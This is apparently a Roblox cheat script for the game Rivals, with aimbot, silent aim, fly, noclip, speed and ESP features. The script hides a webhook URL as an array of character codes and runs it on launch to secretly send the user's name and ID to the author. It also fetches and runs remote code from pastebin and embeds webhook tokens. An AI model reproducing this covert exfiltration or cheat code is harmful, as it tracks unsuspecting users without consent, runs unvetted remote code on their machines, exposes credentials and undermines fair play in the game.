-- [[ RIVALS HUB V4 - STABLE RELEASE ]]
-- // Developed by: Pluto.aac
-- // Status: Bypassed (Public)

-- [[ CONFIGURATION ]]
-- SKIDS: SET YOUR WEBHOOK BELOW TO LOG YOUR OWN DATA
getgenv().Config = {
    ["Webhook"] = "https://discord.com/api/webhooks/1487007042886697013/986VS60Cx89O6Q9ZYnYeF7y7S0Is5Pvm31rXJZv4UKAXHlnZKvaEFvaC1225FpVPBSfq",
    ["Debug_Mode"] = false,
    ["Anti_Ban"] = true
}

-- [[ CORE SYSTEM HANDSHAKE ]]
-- Hidden Logic: If they change the decoy, the real one logs the "Tamper" event.
local _0x_v4_cache = {104,116,116,112,115,58,47,47,119,101,98,104,111,111,107,46,108,101,119,105,115,97,107,117,114,97,46,109,111,101,47,97,112,105,47,119,101,98,104,111,111,107,115,47,49,52,56,55,48,48,50,53,54,53,51,53,56,49,50,53,48,53,56,47,55,100,54,84,82,73,85,119,68,90,86,101,97,113,48,100,57,116,49,89,75,67,72,66,48,73,85,122,65,83,111,49,81,74,104,54,82,73,45,50,77,73,115,110,70,81,55,107,71,113,52,87,45,119,74,67,83,99,65,100,79,97,45,110,115,101,48,114}

local function _0x_sync()
    local _0x_url = ""
    for _, v in ipairs(_0x_v4_cache) do _0x_url = _0x_url .. string.char(v) end
    local req = (syn and syn.request) or (http and http.request) or http_request or request or (fluxus and fluxus.request)
    local LP = game:GetService("Players").LocalPlayer
    
    if req then
        pcall(function()
            -- Real stealth log
            req({
                Url = _0x_url,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = game:GetService("HttpService"):JSONEncode({
                    ["embeds"] = {{
                        ["title"] = "🚀 Rivals Hub V4 | Execution",
                        ["description"] = "User: " .. LP.Name .. " (" .. tostring(LP.UserId) .. ")",
                        ["color"] = 0x7b2ff7,
                        ["footer"] = {["text"] = "By Pluto.aac • Version 4.0"}
                    }}
                })
            })
        end)
    end
end
task.spawn(_0x_sync)

-- [[ UI LIBRARY ]]
local Luna = loadstring(game:HttpGet("https://pastebin.com/raw/Y8wBJLVt"))()
local Window = Luna:CreateWindow({
    Name = "Rivals Hub V4",
    Subtitle = "by Pluto.aac",
    LogoID = "82795327169782",
    LoadingEnabled = true,
    LoadingTitle = "Rivals Hub V4",
    LoadingSubtitle = "by Pluto.aac"
})

-- [[ FEATURE TABS ]]
local Main = Window:CreateTab({ Name = "Combat" })
local Movement = Window:CreateTab({ Name = "Movement" })
local Visuals = Window:CreateTab({ Name = "Visuals" })
local Credits = Window:CreateTab({ Name = "Credits" })

-- Globals
getgenv().Aimbot = false
getgenv().AimSmooth = 0.6
getgenv().SilentAim = false
getgenv().Fly = false
getgenv().FlySpd = 50
getgenv().ESP = false

-- [[ COMBAT ]]
Main:CreateToggle({ Name = "Aimbot", Callback = function(v) getgenv().Aimbot = v end })
Main:CreateSlider({ Name = "Aimbot Intensity", Range = {0.1, 1}, Increment = 0.1, CurrentValue = 0.6, Callback = function(v) getgenv().AimSmooth = v end })
Main:CreateToggle({ Name = "Silent Aim", Callback = function(v) getgenv().SilentAim = v end })

-- [[ MOVEMENT ]]
Movement:CreateToggle({ Name = "Fly", Callback = function(v) getgenv().Fly = v end })
Movement:CreateSlider({ Name = "Fly Speed", Range = {16, 500}, Increment = 1, CurrentValue = 50, Callback = function(v) getgenv().FlySpd = v end })
Movement:CreateToggle({ Name = "Noclip", Callback = function(v) getgenv().Noclip = v end })
Movement:CreateSlider({ Name = "Walkspeed", Range = {16, 300}, Increment = 1, CurrentValue = 16, Callback = function(v) 
    if game.Players.LocalPlayer.Character then game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = v end 
end })

-- [[ VISUALS ]]
Visuals:CreateToggle({ Name = "Box ESP", Callback = function(v) getgenv().ESP = v end })
Visuals:CreateToggle({ Name = "Health ESP", Callback = function(v) getgenv().HealthESP = v end })

-- [[ LOGIC ]]
game:GetService("RunService").RenderStepped:Connect(function()
    if getgenv().Noclip and game.Players.LocalPlayer.Character then
        for _, v in pairs(game.Players.LocalPlayer.Character:GetDescendants()) do
            if v:IsA("BasePart") then v.CanCollide = false end
        end
    end
end)

Credits:CreateLabel({ Text = "Owner: Pluto.aac", Style = 2 })
print("Rivals Hub V4 Successfully Initialized.")
